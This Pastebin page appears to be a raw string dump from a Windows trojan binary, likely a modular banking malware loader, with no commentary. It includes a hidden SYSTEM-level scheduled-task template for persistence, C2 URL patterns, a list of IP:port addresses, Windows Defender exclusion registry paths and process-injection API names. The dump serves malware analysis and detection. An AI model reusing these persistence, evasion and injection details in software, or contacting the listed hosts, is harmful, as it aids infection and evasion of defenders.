Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1
- DIAL
- NAT status
- failed
- client is behind NAT
- client is not behind NAT
- DNSBL
- listed
- not listed
- SINJ
- %s %s
- spk
- tmp
- .tmp
- config.conf
- user
- RES
- group_tag
- %s sTart
- SYSTEM
- <?xml version="1.0" encoding="UTF-16"?>
- <Task version="1.2"
- xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
- <RegistrationInfo>
- <Version>1.0.1</Version>
- <Description>Ms_Net_Cash</Description>
- <URI></URI>
- </RegistrationInfo>
- <Triggers>
- <TimeTrigger>
- <Repetition>
- <Interval>PT10M</Interval>
- <Duration>P415DT15H59M</Duration>
- <StopAtDurationEnd>false</StopAtDurationEnd>
- </Repetition>
- <StartBoundary>
- </StartBoundary>
- <Enabled>true</Enabled>
- </TimeTrigger>
- </Triggers>
- <Principals>
- <Principal id="Author">
- </Principal>
- </Principals>
- <Settings>
- <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
- <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
- <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
- <AllowHardTerminate>false</AllowHardTerminate>
- <StartWhenAvailable>true</StartWhenAvailable>
- <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
- <IdleSettings>
- <StopOnIdleEnd>true</StopOnIdleEnd>
- <RestartOnIdle>false</RestartOnIdle>
- </IdleSettings>
- <AllowStartOnDemand>true</AllowStartOnDemand>
- <Enabled>true</Enabled>
- <Hidden>true</Hidden>
- <RunOnlyIfIdle>false</RunOnlyIfIdle>
- <WakeToRun>false</WakeToRun>
- <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
- <Priority>7</Priority>
- </Settings>
- <Actions Context="Author">
- <Exec>
- <Command>
- </Command>
- </Exec>
- </Actions>
- </Task>
- <BootTrigger>
- <Enabled>true</Enabled>
- </BootTrigger>
- <RunLevel>HighestAvailable</RunLevel>
- <GroupId>NT AUTHORITY\SYSTEM</GroupId>
- <LogonType>InteractiveToken</LogonType>
- <LogonType>InteractiveToken</LogonType>
- <RunLevel>LeastPrivilege</RunLevel>
- <UserId>
- </UserId>
- %Y-%m-%dT%H:%M:%S
- %s.%s
- %s.%s.%s.%s
- Msnetcs
- module
- name
- ctl
- srv
- /%s/%s/0/%s/%s/%s/%s/%s/
- /%s/%s/1/%s/
- /%s/%s/5/%s/
- /%s/%s/10/%s/%s/%d/
- /%s/%s/14/%s/%s/0/
- /%s/%s/23/%d/
- /%s/%s/25/%s/
- %s/%s/63/%s/%s/%s/%s/
- noname
- %s/%s/64/%s/%s/%s/
- data
- info
- No params
- Invalid params count
- Win32 error
- Decode from BASE64 error
- start
- Unable to load module from server
- GetParentInfo error
- Process was unloaded
- Start failed
- release
- Process has been finished
- Module was unloaded
- Process has been finished
- Control failed
- Module already unloaded
- %d%d%d.
- servconf
- expir
- plugins
- psrv
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
- Windows 10 Server
- Windows 10
- Windows Server 2012 R2
- Windows 8.1
- Windows Server 2012
- Windows 8
- Windows Server 2008 R2
- Windows 7
- Windows Server 2008
- Windows Vista
- Windows Server 2003
- Windows XP
- Windows 2000
- Unknown
- x64
- x86
- %s %s SP%d
- Ncrypt.dll
- Bcrypt.dll
- NCryptOpenStorageProvider
- NCryptImportKey
- NCryptDeleteKey
- NCryptFreeObject
- BCryptOpenAlgorithmProvider
- BCryptImportKeyPair
- BCryptGetProperty
- BCryptVerifySignature
- BCryptCloseAlgorithmProvider
- BCryptDestroyKey
- shlwapi
- UrlEscapeW
- GET
- POST
- 0.0.0.0
- kernel32.dll
- HeapAlloc
- GetProcessHeap
- HeapFree
- HeapReAlloc
- Data\
- %s%s_configs\
- %s%s
- <moduleconfig>*</moduleconfig>
- autostart
- yes
- sys
- processname
- autoconf
- autocontrol
- needinfo
- control
- arg
- conf
- file
- period
- name
- id
- ip
- parentfiles
- Module has already been loaded
- Create ZP failed
- Find P failed
- Load to P failed
- Run D failed
- Load to M failed
- Start
- Control
- FreeBuffer
- Release
- svchost.exe
- SignalObjectAndWait
- WaitForSingleObject
- CloseHandle
- ResetEvent
- ExitProcess
- LoadLibraryW
- GetProcAddress
- wtsapi32
- WTSEnumerateSessionsA
- WTSFreeMemory
- WTSGetActiveConsoleSessionId
- WTSQueryUserToken
- winsta0\default
- ------Boundary%08X
- Content-Type: multipart/form-data; boundary=%s
- Content-Length: %d
- --%s
- Content-Disposition: form-data; name="%S"
- --%s--
- Global\Muta
- D:(A;;GA;;;WD)(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;RC)
- ssert
- expir
- checkip.amazonaws.com
- ipecho.net
- ipinfo.io
- api.ipify.org
- icanhazip.com
- myexternalip.com
- wtfismyip.com
- ip.anysrc.net
- /plain
- /ip
- /raw
- /text
- /plain/clientip
- 1045
- client_id
- Module is not valid
- GetNativeSystemInfo
- zen.spamhaus.org
- cbl.abuseat.org
- b.barracudacentral.org
- dnsbl-1.uceprotect.net
- spam.dnsbl.sorbs.net
- ECDSA_P384
- ECCPUBLICBLOB
- SignatureLength
- VERS
- InitializeCriticalSection
- EnterCriticalSection
- LeaveCriticalSection
- ModuleQuery
- ver.txt
- path
- working
- Global\%08lX%04lX%lu
- WinDefend
- MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
- MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths
- MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
- DEBG
- FAQ
- README.md
- %s%s
- info.dat
- .onion
- %s %S HTTP/1.1
- Host: %s%s%S
- POST
- GET
- Content-Length:
- 174.127.217.73:55554
- 162.247.72.201:443
- 185.13.39.197:443
- 88.99.216.194:9001
- 185.22.172.237:443
- 199.249.223.62:443
- 2.137.16.245:9001
- 84.40.112.70:9001
- 212.47.246.229:9003
- 159.89.151.231:9001
- 69.163.34.173:443
- 83.163.164.15:9003
- 82.118.17.235:443
- 37.252.190.176:443
- 185.41.154.130:9001
- cmd.exe
- fifty
- WantRelease
- \iocopy
- api.ipify.org
- api.ip.sb
- ident.me
- www.myexternalip.com
- /?format=text
- path
- CI failed, 0x%x
- pIT NULL
- pIT connect failed, 0x%x
- pIT GetFolder failed, 0x%x
- Win10, Reg success
- Win10, Reg failed
- Create xml failed
- Create xml2 failed
- Register u failed, 0x%x
- Register s failed, 0x%x
- autorun
- <LogonTrigger>
- <Enabled>true</Enabled>
- </LogonTrigger>
- CreateThread
- GetComputerNameW
- lstrcmpW
- lstrlenW
- GetFullPathNameW
- FindFirstFileW
- FindResourceW
- FreeLibrary
- LoadResource
- GetModuleHandleW
- SetFileTime
- lstrcpynW
- GetLastError
- FindClose
- LockResource
- GetSystemInfo
- FindNextFileW
- GetFileTime
- LoadLibraryA
- lstrcmpA
- SetFileAttributesW
- CreateDirectoryW
- WaitForSingleObject
- SignalObjectAndWait
- SetEvent
- CreateRemoteThread
- OpenProcess
- VirtualFreeEx
- ReadProcessMemory
- TerminateProcess
- VirtualProtectEx
- VirtualAllocEx
- ResetEvent
- GetExitCodeThread
- CreateEventW
- DuplicateHandle
- WriteProcessMemory
- ResumeThread
- CreateMutexW
- LocalFree
- lstrcpyW
- DeleteFileW
- SetCurrentDirectoryW
- EnterCriticalSection
- MoveFileW
- GetTempPathW
- GetStartupInfoW
- GetModuleFileNameW
- GetFileAttributesW
- LeaveCriticalSection
- Sleep
- InitializeCriticalSectionAndSpinCount
- GetTickCount
- MoveFileExW
- CreateProcessW
- GetTempFileNameW
- lstrcmpiW
- CreateFileW
- ReadFile
- WriteFile
- SetFilePointer
- GetVersion
- CloseHandle
- GetVersionExW
- GetCurrentProcess
- GetSystemTimeAsFileTime
- GetCurrentProcessId
- lstrlenA
- UnhandledExceptionFilter
- SetUnhandledExceptionFilter
- GetCurrentThreadId
- QueryPerformanceCounter
- GetModuleHandleA
- WideCharToMultiByte
- MultiByteToWideChar
- Process32FirstW
- Process32NextW
- CreateToolhelp32Snapshot
- ADVAPI32.dll
- GetUserNameW
- GetTokenInformation
- LookupAccountSidW
- DuplicateTokenEx
- CreateProcessAsUserW
- EqualSid
- OpenProcessToken
- FreeSid
- AllocateAndInitializeSid
- CryptDestroyKey
- CryptHashData
- CryptDestroyHash
- CryptDecrypt
- CryptCreateHash
- CryptImportKey
- ConvertStringSecurityDescriptorToSecurityDescriptorW
- CryptReleaseContext
- CryptSetKeyParam
- CryptAcquireContextW
- CryptGetHashParam
- LookupPrivilegeValueW
- AdjustTokenPrivileges
- RevertToSelf
- RegCreateKeyExW
- RegCloseKey
- RegOpenKeyExW
- RegSetValueExW
- SetNamedSecurityInfoW
- SetSecurityInfo
- GetSecurityInfo
- SetEntriesInAclW
- GetLengthSid
- CopySid
- InitializeSecurityDescriptor
- SetSecurityDescriptorDacl
- ole32.dll
- CoCreateInstance
- CoUninitialize
- CRYPT32.dll
- CryptStringToBinaryW
- CryptBinaryToStringW
- SHLWAPI.dll
- PathFindFileNameW
- PathAddBackslashW
- PathRenameExtensionW
- StrStrIW
- PathRemoveBackslashW
- PathRemoveFileSpecW
- PathFindExtensionW
- ntdll.dll
- NtQueryInformationProcess
- IPHLPAPI.dll
- GetAdaptersInfo
- USERENV.dll
- CreateEnvironmentBlock
- DestroyEnvironmentBlock
- LoadUserProfileW
- UnloadUserProfile
Add Comment
Please, Sign In to add comment